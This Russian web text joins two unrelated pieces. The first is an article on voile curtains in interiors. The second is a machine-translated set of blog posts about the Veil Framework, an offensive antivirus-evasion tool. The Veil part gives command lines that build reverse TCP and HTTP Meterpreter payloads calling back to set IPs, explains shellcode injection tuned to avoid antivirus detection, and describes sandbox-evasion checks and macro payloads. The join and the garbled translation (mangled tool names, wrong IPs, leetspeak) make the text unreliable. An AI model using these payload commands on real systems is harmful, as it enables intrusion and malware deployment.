Вуаль на окнах: 60+ фото в интерьере, лучшие идеи оформления окна

60+ фото в интерьере, лучшие идеи оформления окна

Плюсы и минусы

Приведем основные достоинства и недостатки вуали.

Плюсы
Описание
Мягкость и легкость драпировкиТкань приятная на ощупь, легко создает нужный дизайн окна. Складки и струящаяся драпировка вполне реализуемы.
Умеренная прозрачностьТкань не дает возможность распознать четкие очертания силуэта.
Приглушает и задерживает солнечный светШторы из вуали можно располагать на окнах, которые ориентированы на южную, юго-восточную стороны света.
Минусы

 

 Малая прочностьЗа счет своей мягкости, вуаль склонна к повреждениям и поэтому требовательна в уходе. Материалу противопоказан отжим, а стирать желательно в деликатном режиме.
Трудное устранение загрязненийПлохо отстирываются пятна, поэтому желательно не делать занавески из вуали на кухне, в столовой или детской. Так же пятна хорошо заметны при дневном освещении.
 Способность электризоватьсяТкань притягивает к себе пыль и очень быстро загрязняется. 

Виды штор

Шторы с вуалью, прекрасным образом вписываются в интерьер и становятся незаменимыми в создании уютного пространства. Неиссякаемые дизайнерские эксперименты, задают  вариативность драпировок в интерьере.

Гардины

Виды гардин  многочисленны, однако их форма характерна простотой и лаконичностью. Часто встречаемый дизайн гардин в интерьере — гардины-ножницы, которые имеют классическую прямоугольную форму занавесок спускающихся до пола с одинаковой длиной по обе стороны. Гардины-ножницы часто комбинируют с люверсами, что делает интерьер более современным. 

Двойные

Наделяют пространство объемом и роскошью. Первый слой (ближе к окну) может служить завесой от солнечного света, а второй — задавать настроение и дизайн.

Римские

Римские шторы с использованием вуали, формируют стильное пространство. С помощью разноуровневой фиксации полотна по высоте, оконный проем всегда имеет новый образ.

На фото кухня с римскими шторами.

Фотошторы

Если интерьеру не хватает композиционного центра, то на помощь придут фотошторы. Современный производитель предлагает широкий ряд тематических сюжетов — от мелко парящей бабочки застывшей на поверхности тюли, до крупного рисунка (архитектура, природа, техника и др.).

Австрийские

Австрийские шторы самодостаточны в любом пространстве и редко нуждаются в комбинации с другими видами штор. При желании их украшают бахромой, кружевом, шнурами и другим декором. Очень нарядно и романтично выглядят модели, украшенные контрастными тканевыми розами или бантами.

На фото австрийские шторы с рисунком.

Французские

Этот вид штор красив и торжественен. Французские шторы из вуали часто встречаются в кабинетах, гостиных, кухнях. Преимущественно используются пастельные цвета, а наиболее востребованный из них — айвори.

На фото французские шторы с декоративным бусенным кантом по краю.

Размеры занавесок

Размер занавесок по высоте может сформировать не однозначный визуальный эффект в помещении — от пространства с высокими потолками, до иллюзии кукольного домика.

Короткие

Данный вид уместен в кухонной зоне. Стоит отметить, что подобные занавески гармонично впишутся в помещение с высокими потолка.

Длинные

Занавески до пола, а порой и умышленно струящиеся по его поверхности, визуально делают помещение выше. При использовании вертикальной полоски, этот эффект усиливается.

На фото гостиная с длинными занавесками из вуали на изящном матовом карнизе.

Идеи в интерьере комнат

Драпировка из вуали прекрасно смотрится во всех жилых помещениях.

Кухня

В кухонной зоне эффектно смотрятся белые шторы, однако наличие принта в занавеске оживляют пространство и сделают повседневные загрязнения менее заметными. Приемлемый рисунок — цветок, вензель, горох, полоска и др.

Спальня

В спальне, атмосферу отдыха подарят шторы с природным орнаментом, вензелем, полоской.  Успокаивающий эффект может быть достигнут путем  правильного подбора цветов: персикового, бежевого, коричневого, зеленого и др.

На фото спальня в бежевой цветовой гамме.

Гостиная или зал

Прекрасно впишется в интерьер гостиной занавеска с эффектом плиссе, что сделает пространство воздушным и легким. Так же, вуаль служит прекрасным дополнением к драпировке с другими видами штор в спальне.

Детская комната

Комфортная обстановка в детской комнате так же зависит от выбора текстиля. Пастельные тона штор успокоят гиперактивного ребенка, а яркие цвета сделают пространство динамичным.

Балкон

Если окна дома выходят на солнечную сторону, то стоит обратить внимание на шторы с вуалью приглушенных тонов с высокой плотностью, а если внутреннему пространству не хватает инсоляции — подойдут светлые оттенки.

На фото балкон с легкими бежевыми занавесками.

Ванная комната

Ванная комната пожалуй единственная зона, где может использоваться любой вид штор из вуали.

На фото ванная комната с воздушными занавесками из вуали в комбинации со льняными римскими шторами.

Цветовая гамма

Современные производители штор предоставляют множество цветовых палитр, расцветка которых подойдет практически любому интерьеру.

  • Белый. Классический цвет, который уместен в любом интерьере. Если кипельно белый  необходимо приглушить, на помощь придет занавеска молочного цвета.
  • Зеленый. Успокаивающие оттенки зеленого прекрасно сбалансируют пространство. А оттенки салатового сделают пространство свежим и необычным.
  • Серый. Ультрамодные серые шторы из вуали в сочетании с белыми поверхностями и предметами интерьера сделают пространство современным.
  • Бежевый.  Бежевые шторы привнесут благородство и изысканность в интерьер. И хотя этот цвет один из традиционных, он популярен в любые времена для людей, которые стремятся создать теплую обстановку.
  • Сиреневый. Занавески сиреневого цвета освежают любое пространство.
  • Бирюзовый.  Бирюзовые занавески сочетают в себе два цвета  — голубой и зеленый, которые в свою очередь наделяют пространство прохладой и морской свежестью.
  • Черный. Шторы темных оттенков задают глубину помещению и хорошо блокируют солнечный свет.
  • Синий. Синие шторы идеально могут сочетаться с бирюзовым, фиолетовым, белым, голубым цветами. Интересное сочетание получится с зелеными и серыми компаньонами.
  • Красный. Занавески красного цвета акцентируют внимание на образе окна.

Дизайн и рисунки

Шторы из вуали имеют разнообразные рисунки от царских узоров, природных и геометрических орнаментов, до еле уловимых мелких принтов. Каждый из них находит свое место в интерьерах.

С вышивкой

Рисунок с вышивкой привносит в интерьер утонченность и романтичность. Такие воздушные занавески прекрасно дополнят образ гостиной, спальни или детской.

На фото ажурные занавески из вуали в кухонной зоне. Прекрасные белые чашки, абажур и фасады кухни формируют воздушный образ.

Радуга

Шторы с радужным мотивом, сделают пространство позитивным, а так же будут хорошим дополнением в детской комнате.

Узоры и орнаменты

Легкие узоры на занавеске, подчеркнут нарядность оконного проема и пространства в целом.

Цветы

Цветочные мотивы оживляют любое пространство и делают его утонченным.

С тиснением

Если в пространство требуется включить рисунок, то выбор можно остановить на занавесках с тиснением. Наиболее распространенные мотивы — вензель, бабочка, ветки с листьями, геометрия и др.

Многоцветные

Занавески с градиентным переходом цвета от светлого к темному оттенку, смотрятся необычно и изыскано. Так же в текстильной промышленности встречается эффект омбре, разные цвета которого плавно перетекают из одного в другой.

Многослойные

Шторы из нескольких рядов вуали создают ощущение роскоши в интерьере. 

Элементы декорирования

Рассмотрим наиболее встречаемые элементы декорирование занавесок.

  • Подхваты. Данный элемент оживить и добавит мягкую эллиптическую линию прямой шторе. Дизайн подхватов многообразен — металлические, тканевые, кисти, цветочные композиции и др. От высоты расположения крючка с подхватами, зависит визуальный эффект всего пространства в целом.
    Так, можно визуально раздвинуть пространство в ширину, либо увеличить помещение в высоту.
  • Ламбрекены. Законченный образ штор задают ламбрекены, однако их участие обычно сводится к оформлению окна в классическом стиле.
  • С бусинками. Наличие бусин в занавесках преображает образ окна, задавая ноту игривости и романтики. Прекрасным дополнением к бусинам будут небольшие включения мелких кистей и страз.

Варианты комбинирования

Вуаль прекрасно сочетается с другими видами тканей, таких как лен, хлопок, велюр, сетка и др.

Портьеры и гардины

Композиция портьеры и гардины в двух цветах, подарят пространству воздушность и легкость.

Нитяные шторы (кисея)

Необычные шторы из нитей будут оригинальным решением в интерьере. Они самодостаточны, однако прекрасно комбинируются с другими видами штор. Хорошо решают зонирование пространства образуя воздушные нитяные простенки.

Как ухаживать и чистить?

Подходящим вариантом чистки вуали служит ручная стирка, однако при недостатке времени возможно освежить занавески в стиральной машине придерживаясь следующих рекомендаций:

  • Выбирать деликатный режим и температуру не более 40 градусов. Не рекомендуется делать температуру выше, так как ткань садится при стирке;
  • Как отбелить и чем отбелить? Не испортить ткань помогут кислородные или оптические отбеливатели. Последние не подходят для цветной вуали. В составе средств не должно быть хлора;
  • Изделие гладят слегка влажным при температуре 100 °C и вешают на карниз.

Фото галерея

Шторы из вуали создают уютную атмосферу и служат прекрасным дополнением к любому интерьеру.

Декорируем окна с помощью штор из вуали

Содержание статьи:

  • Со шляпы на окно: вуаль в истории моды
  • Вуаль: описание и свойства
  • Вуаль: цвета и декор
  • Вуаль для пошива штор: за и против
  • Вуаль в современном интерьере: любопытные идеи
  • Как ухаживать за вуалью: советы хозяйкам

Вуалевая ткань словно пронизана лирическими настроениями Серебряного века и обаянием роскоши. Элегантная вуаль на окнах наполнит комнату воздухом и мягким рассеянным сиянием, словно светясь изнутри.

Поэтический образ вуали не раз использовался в литературе. Ахматова, Блок, Фет, – загадочный образ вуали очаровывал и притягивал великих! «Я узнаю тебя и твой белый вуаль…», «И странной близостью закованный, смотрю за темную вуаль…», «Сжала руки под темною вуалью…». Сомерсет Моэм, вдохновленный сонетом Перси Биши Шелли: «О, не приподнимай покров узорный, который люди жизнью называют», написал свою знаменитую «Разрисованную вуаль», где полупрозрачный покров – аллегория, символ человеческой жизни.

Со шляпы на окно: вуаль в истории моды

Загадка вуали будоражит умы с незапамятных времен. Женщины в античности любили окружать себя ореолом тайны, скрыв лицо за легкой полупрозрачной материей. В Древнем Египте были в ходу вуалеобразные покрывала «биссус» из тонко выделанного льна.

Традиционное одеяние ветхозаветной иудейки включало легкую вуаль «радиб», а в средние века высокий головной убор с длинным вуалевым шлейфом отличал благородную даму от простолюдинки.

Мистический образ роковой красавицы, скрывшей лицо под темной вуалью, создал поэзию декаданса и золотой век Голливуда. Грета Гарбо, Марлен Дитрих и Жаклин Кеннеди охотно подыгрывали мифу, пряча возраст и усталость под игривыми вуалетками. Декораторы черпают вдохновение в потоке стильных образов с вуалью, обыгрывая полупрозрачные материалы в оформлении окон.

Эпатажная певица и фотомодель Дита фон Тиз – большая поклонница вуали. Кокетливая шляпка с вуалеткой – важный штрих к ретро-образу экстравагантной знаменитости. Нестареющая икона стиля Айрис Апфель не прочь подразнить консервативную публику смелым сочетанием вуалевой ткани с шерстью грубой вязки, а яркий молодежный бренд Jil Sander украшает вуалью трикотажные шапочки спортивных фасонов – эклектика сейчас в тренде!

Вуаль: описание и свойства

Вуалью может называться любая светопроницаемая материя с полотняным переплетением.

До изобретения синтетического волокна вуалевые ткани получали из хлопка, шелков и тонкой шерсти. В наше время актуален полиэстер и смесовое полотно на основе полиэфирного волокна. Синтетики не стоит опасаться: все виды вуалевых тканей отлично пропускают воздух и рассеивают солнечный свет, не затемняя помещение.

Умеренный матовый блеск оттеняет чувственную фактуру материала, играя переливами светотени в нежных складках драпировок. На ощупь вуаль намного приятнее органзы: вместо покалывания ощущается мягкость и комфорт.

Фабрики, производящие вуаль, ранжируют по стоимости виды тканей. Элитный сегмент представляют редкотканные сетчатые материалы, имитирующие кружево; коммерческий ассортимент укомплектован хлопчатобумажными и смесовыми изделиями.

Вуаль: цвета и декор

Фактура вуали не предусматривает ярких кричащих расцветок. Чаще всего встречаются три типа цветового исполнения вуалевых тканей:

  • гладкокрашеные;
  • беленые;
  • набивные.

Классические шторы из вуали шьются из однотонного полотна сдержанных светлых и пастельных тонов. Более экспрессивные решения подсказывает разнообразный декор: вышивка, кружево и окантовка, реже – печатные узоры и графические орнаменты.

Вуалевые ткани пастельных тонов – торжественно и благородно

Розы из вуали – почти как живые!

Тенденция к многослойности находит применение в декорировании сетчатого полотна объемными аппликациями из вуали в виде цветов и перьев.

Хлопчатобумажная ткань вуаль цвета первого снега выгодно контрастирует с плотными портьерами густого сочного оттенка. Занавеси с золотистым и серебристым напылением гармонично впишутся в неоклассический интерьер, а модные металлизированные оттенки незаменимы в современной урбанистической эстетике. На смесовом полотне часто применяется технология травления: при помощи химреактивов на поверхность материи наносится контурный рисунок.

Вуаль с эффектом градиента – последний писк моды. Раскладка может быть выполнена не только от одного оттенка к другому, но и от любого базового цвета к белому.

Вуаль для пошива штор: за и против

Ламбрекены из вуали – легкие, как перышко!

Дизайнеры уважают все виды вуалевых тканей за податливость в работе. Мягкая и пластичная ткань легко собирается в складки невообразимых форм и хорошо держит форму. Ламбрекены, балдахины и гардины из летящей вуали одинаково хороши в сольном исполнении и в сочетании с плотными портьерами.

Просвечивающая ткань производит впечатление свежести и невесомости, поэтому вуали широко востребованы в интерьерах дворцового типа с пышными вычурными драпировками в стиле барокко и рококо.

Сложнейшая многослойная композиция с несметным количеством гирлянд, свагов и перекидов не покажется громоздкой, если разбавить тяжелый бархат и парчу вуалью или набросить на портьеры воздушные подшторники из вуалевого полотна с гипюровыми вставками. В просторной гостиной элегантно смотрятся австрийские и французские гардины приглушенных пастельных оттенков.

Красота вуали достойна восхищения, но прежде чем шить шторы из вуалевой ткани, обратите внимание на слабые стороны материала. Вуаль сильно мнется и разглаживается с трудом, а некоторые ее разновидности вдобавок подвержены выгоранию и накапливают статический заряд, притягивая пыль.

Белоснежная вуаль для маленькой гостиной: больше света – больше простора!

Французские гардины из вуали – элегантность на все времена!

Вуаль в современном интерьере: любопытные идеи

Занавески-кафе – мило и уютно

Отвечая на вопрос, что делают из ткани вуаль в малогабаритных квартирах, дизайнеры предлагают несколько эффектных ходов:

  • лаконичные шторки на петлях, сшитые из контрастных тканевых полосок;
  • шторы-вафли в ромбовую складку;
  • двойное плиссе – тонкие складки в два ряда, расположенные в шахматном порядке;
  • римские, австрийские или рулонные гардины с нашивным вертикальным кантом;
  • занавески-кафе с узкими карандашными складками.

Как ухаживать за вуалью: советы хозяйкам

Содержать вуалевые занавеси в чистоте и порядке непросто, но результат оправдывает усилия. Деликатное полотно обычно стирают вручную при температуре не выше 30-40 градусов. Если допускается машинная стирка, следует придерживаться деликатного режима. Выкручивать, тереть и отжимать вуаль категорически не рекомендуется, так как при этом повреждается структура ткани.

Для безопасного удаления стойких пятен опытные хозяйки советуют замочить вуалевые шторы в холодном растворе щадящего моющего средства. Через несколько часов загрязнения должны сойти.

Занавеси сушат в расправленном виде, позволяя стечь воде. Если полотно нуждается в утюжке, необходимо использовать подкладку и сбрызнуть ткань водой. Не нагревайте утюг выше 110 градусов, а еще лучше – используйте вертикальный отпариватель. Гардины щедро отблагодарят вас за заботу!

Veil — Framework —

Начиная с версии 1. 0 Veil, шелл-код внедрялся в память одинаковым образом (в основном во всей отрасли). Это выполняется в следующие шаги:

  1. Выделение памяти с разрешениями RWX (чтение, запись и выполнение) для записи в нее шелл-кода и его выполнения
  2. Записать шеллкод в ранее выделенную память
  3. Создать поток для выполнения шеллкода
  4. Подождите, пока завершится выполнение шелл-кода (т. е. вы выйдете из Meterpreter или Beacon), прежде чем разрешить выход стейджера

Однако RWX не совсем «обычный» и потенциально может рассматриваться как вредоносный антивирусными ядрами/песочницами. Поговорив об этом с Кейси (@subtee), я решил изменить то, как Veil внедряет шелл-код в память. Начиная с версии 3.1 Veil, почти ни один из стейджеров Veil «shellcode_inject» не использует память RWX.

Veil 3.1 теперь будет выделять память с разрешениями RW, чтобы стейджер мог записывать шелл-код в выделенную память. После записи шелл-кода в выделенную память стейджер вызовет VirtualProtect, чтобы изменить права доступа к памяти с RW на RX. В этот момент стейджер продолжит вызывать CreateThread и WaitForSingleObject как обычно. Пример кода этого можно увидеть ниже:

Строка 3 изменена с Veil 3.0 на 3.1. Последний параметр, передаваемый в вызов VirtualAlloc, — это 0x04, а не 0x40, что специально устанавливает для памяти режим ReadWrite. В строке 5 стейджер вызывает VirtualProtect, который изменяет выделенную память на ReadExecute.

Хотя эта настройка полностью скрыта и, вероятно, будет прозрачна для вас почти во всех случаях использования, мы надеемся, что небольшие настройки, подобные этой, могут помочь либо сейчас, либо в будущем.

Свяжитесь с нами, чтобы оставить отзыв!

Опубликовано Кристофер Трансер 1

Большинство пользователей Veil будут использовать интерактивное меню Veil для создания шелл-кода и/или полезной нагрузки Veil. Тем не менее, я ожидаю, что, хотя только меньшинство пользователей использует параметры командной строки, они делают это довольно активно. Поэтому я хотел убедиться, что для Veil существует интерфейс командной строки на тот случай, если пользователь захочет запрограммировать его использование (или любым другим способом). В выпуске Veil 3.0 некоторые параметры остались прежними, но в инструмент было добавлено несколько дополнительных параметров командной строки, которые я надеюсь объяснить здесь.

Я расскажу, как использовать Ordnance внутри Veil из командной строки, это должно быть (в идеале) довольно просто. Если вы раньше не использовали Ordnance, это инструмент, который используется для быстрого создания шелл-кода для различных полезных нагрузок, вместо того, чтобы полагаться на msfvenom для создания шелл-кода для вас.

./Veil.py -t Боеприпасы —list-payloads
 

Эта команда указывает Veil вывести список всех полезных нагрузок (–list-payloads) для инструмента Ordnance (-t Ordnance).

./Veil.py -t Боеприпасы —list-encoders
 

Эта команда указывает Veil вывести список всех энкодеров (–list-encoders) для инструмента Ordnance (-t Ordnance).

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234
 

Эта команда указывает на использование артиллерийских орудий (-t Ordnance) и создание обратной полезной нагрузки tcp (–ordnance-payload rev_tcp), которая подключается обратно к IP-адресу 192.168.1.20 (–ip 192.168.1.20) через порт 1234 (–port 1234) .

./Veil.py -t Боеприпасы --ordnance-payload rev_http --ip 192.168.1.21 --port 1235 -e xor -b \\x13\\x98
 

Эта команда указывает на использование боеприпасов (-t Ordnance) и создает обратную полезную нагрузку http, которая подключается обратно к ip 192.168.1.21 (-ip 192.168.1.21) через порт 1235 (-port 1235). Далее команда указывает, что следует применять кодировщик xor (-e xor) и избегать использования недопустимых символов \x13\x98 (-b \\x13\\x98).

Давайте рассмотрим пару команд, и я объясню их компоненты:

./Veil.py -t Уклонение --list-payloads
 

Эта команда указывает Veil вывести список всех полезных нагрузок (-list-payloads) для инструмента Evasion (-t Evasion).

./Veil.py -t Evasion -p 33 --ordnance-payload rev_tcp --ip 192.168.1.3 --port 8675 -o christest
 

Эта команда фактически сгенерирует исполняемую полезную нагрузку. Он указывает, что полезная нагрузка Evasion (-t Evasion) номер 33 (-p 33) выбирается пользователем. Для генерации шелл-кода используйте полезную нагрузку rev_tcp Ordnance (–ordnance-payload rev_tcp) и установите IP-адрес обратного вызова равным 19.2.168.1.3 (-ip 192.168.1.3) и порт обратного вызова на 8675 (-port 8675). Наконец, назовите выходной файл christest (-o christest).

Главное, что следует учитывать при работе с этой командой, это то, что она использует Ordnance для генерации шелл-кода.

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris
 

Эта команда очень похожа на предыдущую, но использует msfvenom для генерации шелл-кода. Команда указывает на использование полезной нагрузки Evasion (-t Evasion) с номером 41 (-p 41) и создание шелл-кода windows/meterpreter/reverse_tcp через msfvenom с IP-адресом обратного вызова, установленным на 19. 2.168.1.4 (-ip 192.168.1.4) и порт обратного вызова установлен на 8675 (-порт 8675). Наконец, он называет выходной файл chris (-o chris).

А что, если вы хотите указать некоторые из необходимых опций для полезной нагрузки? Вот ваш ответ!

./Veil.py -t Evasion -p 34 --ordnance-payload rev_tcp --ip 192.168.1.5 --port 8677 -o chrisout -c имя хоста=сетевые процессоры=2
 

Эта команда указывает на использование полезной нагрузки Evasion (-t Evasion) с номером 34 (-p 34) и на то, чтобы боеприпасы генерировали полезную нагрузку обратного tcp (-ordnance-payload rev_tcp) с IP-адресом обратного вызова, установленным на 19.2.168.1.5 (-ip 192.168.1.5) с портом обратного вызова 8677 (-port 8677). Выходной файл называется chrisout (-o chrisout), и указываются две проверки. Полезная нагрузка будет явно проверять, чтобы убедиться, что имя хоста системы, на которой работает полезная нагрузка, — «thegrid» (-c hostname=thegrid) и что в системе есть как минимум два (2) процессора (processors=2). Да, между именем хоста=thegrid и процессорами=2 есть пробел.

Если вы хотите проверить только имя хоста, вы должны удалить процессоры=2 из команды -c (теперь команда будет выглядеть как -c hostname=thegrid). Встраивание базовых проверок, таких как эти, в ваши полезные данные может быть полезно при попытке перечислить и избежать песочниц.

./Завеса.py --clean
 

В идеале этот не требует пояснений. Если вы создали несколько полезных нагрузок и просто хотите удалить весь скомпилированный вывод, исходный код, файлы обработчиков и отслеживаемые хэши, запустите эту команду, и Veil удалит все.

Надеюсь, это поможет объяснить интерфейс командной строки Veil. Однако, если у вас есть какие-либо вопросы, не стесняйтесь обращаться к нам через Twitter (@VeilFramework или @ChrisTruncer), и я буду рад ответить на любые вопросы. Если вы столкнулись с какими-либо ошибками, не стесняйтесь создавать проблему на Github!

Опубликовано Кристофер Трансер 0

The Veil Framework — это набор инструментов, предназначенных для использования во время наступательного тестирования безопасности. Когда время потребует этого, FortyNorth Security будет использовать Veil-Framework для достижения своей цели. Наиболее часто используемым инструментом является Veil-Evasion, который может превратить произвольный сценарий или фрагмент шелл-кода в исполняемый файл Windows, который не будет обнаружен обычными антивирусными продуктами.

Veil 2.0 стал общедоступным 17 июня 2013 г., и с тех пор базовая структура практически не изменилась. Были внесены некоторые изменения в сам фреймворк, но, как правило, они носили незначительный характер, при этом большинство изменений касалось поддержки новых языков программирования и новых модулей полезной нагрузки.\

Проведя несколько лет разработки на Python, я снова кодовую базу Veil и определили части серверной среды, которые можно было бы разработать более эффективно. Спустя полгода, после рефакторинга кодовой базы и добавления большого количества обновлений, я рад представить Veil 3. 0. Главное меню показано на рис. 1. 9Рис. 1. Главное меню Veil 3 -life (EOL) в 2020 году, поэтому не было особого смысла тратить время на выполнение большого обновления Veil на языке, который через три года перестанет поддерживаться.

Обновление Veil с Python 2 до Python 3 было самой трудоемкой частью создания Veil 3. Запуск инструмента 2to3 не был вариантом; процесс преобразования требовал ручной проверки практически всех изменений в Veil.

Одно из основных различий при разработке Veil на Python 3 и Python 2 заключается в том, как обрабатывается и модифицируется шелл-код. Чтобы проиллюстрировать эту проблему, на рис. 2 показан стейджер на основе Python 2, который включает зашифрованный шелл-код, который нужно расшифровать во время выполнения.

Рисунок 2: Дешифратор AES из Veil 2 в Python 2

Хотя код на рисунке 2 работает в Python 2, он не будет работать в Python 3. В частности, в Python 3 шелл-код больше не требуется. строка перешла в массив байтов после расшифровки. Результатом расшифровки Python 3 являются исходные данные в виде открытого текста в массиве байтов, которые немедленно используются остальной частью скрипта. На рис. 3 показана версия того же стейджера дешифрования для Python 3.

Рисунок 3: Дешифратор AES из Veil 3 в Python 3

Ordnance

Ранние версии Veil полагались на инструмент msfvenom из Metasploit Framework для генерации шелл-кода для полезных нагрузок Veil. Однако после первоначального выпуска Veil это вызвало проблему. Вывод msfvenom изменился, и это полностью нарушило способность Veil обрабатывать вывод msfvenom. Предоставив исправление для устранения проблемы, команда Veil решила, что потребуется другое решение, вместо того, чтобы полагаться на инструмент, находящийся вне нашего контроля.

Таким образом, Veil-Ordnance был разработан и выпущен в 2015 году. Veil-Ordnance — это инструмент, который генерирует шелл-код для использования в стейджерах Veil-Evasion. Разработка Veil-Ordnance имела два основных преимущества:

  1. Команда разработчиков Veil контролирует результат, предотвращая любые будущие проблемы совместимости с Veil-Evasion.
  2. Генерация шелл-кода
  3. выполняется быстрее с Veil-Ordnance.

Раньше Veil-Evasion и Veil-Ordnance были двумя отдельными инструментами. С выпуском Veil 3.0 это уже не так, как показано на рис. 4.9.0003

Рисунок 4: Боеприпасы, включенные в Veil 3.0

Пользователи Veil 3.0 по-прежнему могут использовать msfvenom для генерации своего шелл-кода, но теперь у них и есть возможность использовать боеприпасы. Ordnance сможет немедленно сгенерировать шелл-код после того, как пользователи предоставят IP-адрес и порт, к которым шелл-код должен подключиться или прослушивать. Ordnance поддерживает самые популярные типы полезной нагрузки:

  1. Reverse TCP
  2. Обратный HTTP
  3. Обратный HTTPS
  4. Обратный TCP DNS
  5. Обратный TCP Все порты
  6. Привязать TCP

Это дает пользователям Veil несколько вариантов выбора — они могут придерживаться msfvenom или использовать новый встроенный инструмент Ordnance.

Дополнительные языки

Хотя сама Veil написана на Python, обрабатываемые полезные данные и выходные файлы могут быть на других языках программирования. В Veil 3.0 теперь поддерживаются два дополнительных языка:

  • AutoIt3
  • Луа

Полезные нагрузки Lua поддерживаются только в формате сценария, который должен быть скомпилирован и запущен с использованием среды выполнения lua, но Veil 3.0, работающий в Linux, может компилировать сценарии AutoIt3 в исполняемые файлы Windows. Veil 3.0 также поддерживает семь языков, ранее поддерживаемых в версии 2.0:

  • Python
  • PowerShell
  • С
  • С#
  • Перл
  • Рубин
  • Голанг
Обнаружение окружающей среды

Еще одна новая функция Veil 3.0 — возможность проверять информацию о системе, в которой работает полезная нагрузка Veil. Эта функция полезна для обеспечения того, чтобы шелл-код выполнялся только на целевых системах и в течение периода взаимодействия. Стейджер выполняет эти проверки и внедряет и выполняет встроенный шелл-код только в том случае, если выполняются указанные условия. На рис. 5 показаны параметры этой функции. 9Рисунок 5: Параметры обнаружения окружающей среды

  • Дата истечения срока действия полезной нагрузки.
  • Имя хоста системы, на которой выполняется полезная нагрузка.
  • Минимальное количество процессоров в системе, на которой выполняется полезная нагрузка.
  • Требуемое имя пользователя для запуска полезной нагрузки.
  • При указании более одной проверки должны выполняться все проверки; в противном случае стейджер прекратит выполнение без выполнения шелл-кода.

    Это касается основных обновлений версии Veil 3.0. Если у вас есть какие-либо вопросы или вы столкнулись с проблемой, посетите репозиторий Veil на Github. Я надеюсь, что Veil поможет вам в дальнейших оценках так же, как она помогла нам.

    Опубликовано Кристофер Трансер 0

    В феврале этого года у нас есть несколько обновлений Veil-Evasion. Во-первых, мы обновили версию PyInstaller, используемую Veil-Evasion, с pyinstaller 2 до 3.1. Одна дополнительная функция, которую это позволяет, — это возможность шифровать байт-код, который выводит pyinstaller. Мы используем эту функцию, генерируя случайный ключ каждый раз при запуске Veil-Evasion и предоставляя его при использовании PyInstaller для преобразования кода Python в исполняемый файл Windows.

    Другая модификация Veil-Evasion заключается в том, что я добавил некоторую обфускацию к самой полезной нагрузке Python. Я определил некоторые области, в которых разные антивирусы пытаются пометить полезные нагрузки Python, так что это должно помочь с некоторыми проблемами обнаружения. Были обнаружены и другие возможные сигнатуры, но я жду, чтобы узнать, как антивирусные компании отреагируют на это новое запутывание.

    Спасибо, надеюсь, что это может помочь, и удачи! #авлол

    Опубликовано Кристофер Трансер 1

    Добро пожаловать в 2016 год! Для первого поста/релиза года я рад представить новый язык! Во-первых, в предисловии к этому выпуску я изложу свое политкорректное мнение о том, что Perl — это не весело. Однако это не означает, что он непригоден для написания инжекторов шелл-кода!

    В этом месяце я выпускаю стандартный «плоский» шаблон внедрения шелл-кода для Perl, который позволяет создавать инжекторы шелл-кода Perl. Однако, если вы запустите этот модуль, вы увидите что-то отличное от других модулей, которые в настоящее время поддерживает Veil-Evasion, прямо сейчас в Kali нет собственной компиляции Windows.

    В этом выпуске мне еще не удалось установить все необходимые зависимости в Wine и работать. Существует обходной путь, аналогичный выходным данным Python Py2Exe: вы можете «скомпилировать» этот perl-скрипт в автономный исполняемый файл Windows с помощью виртуальной машины Windows. Хотя это и не самый идеальный вариант, я лично всегда использую виртуальную машину Windows в дополнение к виртуальной машине Linux во время тестов, поэтому я полагаю, что многие из вас следуют аналогичной настройке.

    Чтобы сгенерировать исполняемый файл Windows, вам нужно выполнить пару шагов:

      1. Создайте свою полезную нагрузку Perl, как и любую другую полезную нагрузку Veil-Evasion. После завершения Veil-Evasion вы получите вывод исходного кода (как обычно), но не исполняемый файл.
      2. Переместите сценарий perl на виртуальную машину Windows (проверено на Windows XP x32 и Windows 7 x64).
      3. Установите Perl (x32) на виртуальную машину Windows (я лично протестировал этот процесс, используя последнюю сборку Strawberry Perl x32).
      4. После установки Perl откройте командную строку и запустите «cpan PAR::Packer».
        1. Этот шаг займет некоторое время и потребует подключения к Интернету
      5. Перейдите к выходным данным . pl Veil-Evasion в командной строке и введите «pp –gui -o ​​»

    Теперь у вас есть исполняемый файл Perl!

    Я понимаю, что это не самая идеальная установка, но я бы предпочел, чтобы у нас была возможность генерировать эти полезные нагрузки, а не откладывать выпуск. Я продолжу искать способ заставить это работать в Wine, но если кто-то хочет помочь разобраться с этим, я определенно буду признателен 🙂

    В любом случае, надеюсь, что это поможет, и счастливого Нового года!

     

    Опубликовано Кристофер Трансер 1

    Здравствуйте!

    В этом месяце я добавил два разных модуля для нашего Дня победы в ноябре 2015 года, и оба связаны с нашими полезными нагрузками powershell!

    Во-первых, я построил поверх нашего модуля загрузки и внедрения HTTP powershell и добавил возможность загружать код на лету с HTTPS-сервера. Этот модуль будет загружать код с веб-серверов, защищенных HTTPS, которые не используют действительный сертификат (читай, самоподписанный).

    Далее в Veil-Evasion был добавлен еще один вспомогательный модуль. Мы создали модуль на основе сообщения в блоге khr0x40sh, в котором полезная нагрузка Veil-Evasion powershell/shellcode_inject/virtual была преобразована в код макроса. Этот новый вспомогательный модуль просто выполняет шаги, описанные в сообщении блога, и автоматизирует процесс. Он выведет текстовый файл, содержащий код, который нужно просто вставить, и тогда у вас будет действительный рабочий макрос. Единственный вариант, который вам нужно будет указать, — это если вы собираетесь запускать код в системе x86 или x64.

    Мы надеемся, что это поможет, и у нас еще есть много модулей для будущих выпусков! Дайте мне знать в #Veil на freenode, если у вас есть какие-либо вопросы!

    Опубликовано Кристофер Трансер 0

    Всем привет!

    Давно не было релиза, я знаю! Сегодня у нас два небольших обновления. Для выпуска полезной нагрузки полезная нагрузка Ruby, внутри которой закодирован шеллкод base64 (и декодируется во время выполнения), была добавлена ​​в Veil-Evasion (спасибо ребятам из #ruby на Freenode за некоторую помощь).

    Кроме того, Veil-Ordnance получила обновление. Как бы то ни было, модули Veil-Ordnance были жестко закодированы в приложении. Ordnance теперь будет динамически подбирать новые модули полезной нагрузки и кодировщика, которые добавляются к нему, что упрощает расширение функциональности Veil-Ordnance!

    Наконец, полезная нагрузка th4 r3l3as3s hav3 slow3d du3 для работы над обновлением проекта. Hop3fully w3’ll b3 abl3 to g3t a r3l3as3 скоро, но в th4 m3antim3 я сделаю свой b3st to 3nsur3 th4 payloads ar3 r3l3as3d на tim3 3ach V-Day. Hop3 это h4lps, а f33l fr33, чтобы задать любые вопросы в #Veil на Fr33nod3!

    Опубликовано Кристофер Трансер 0

    Привет и добро пожаловать на июньский День Победы!

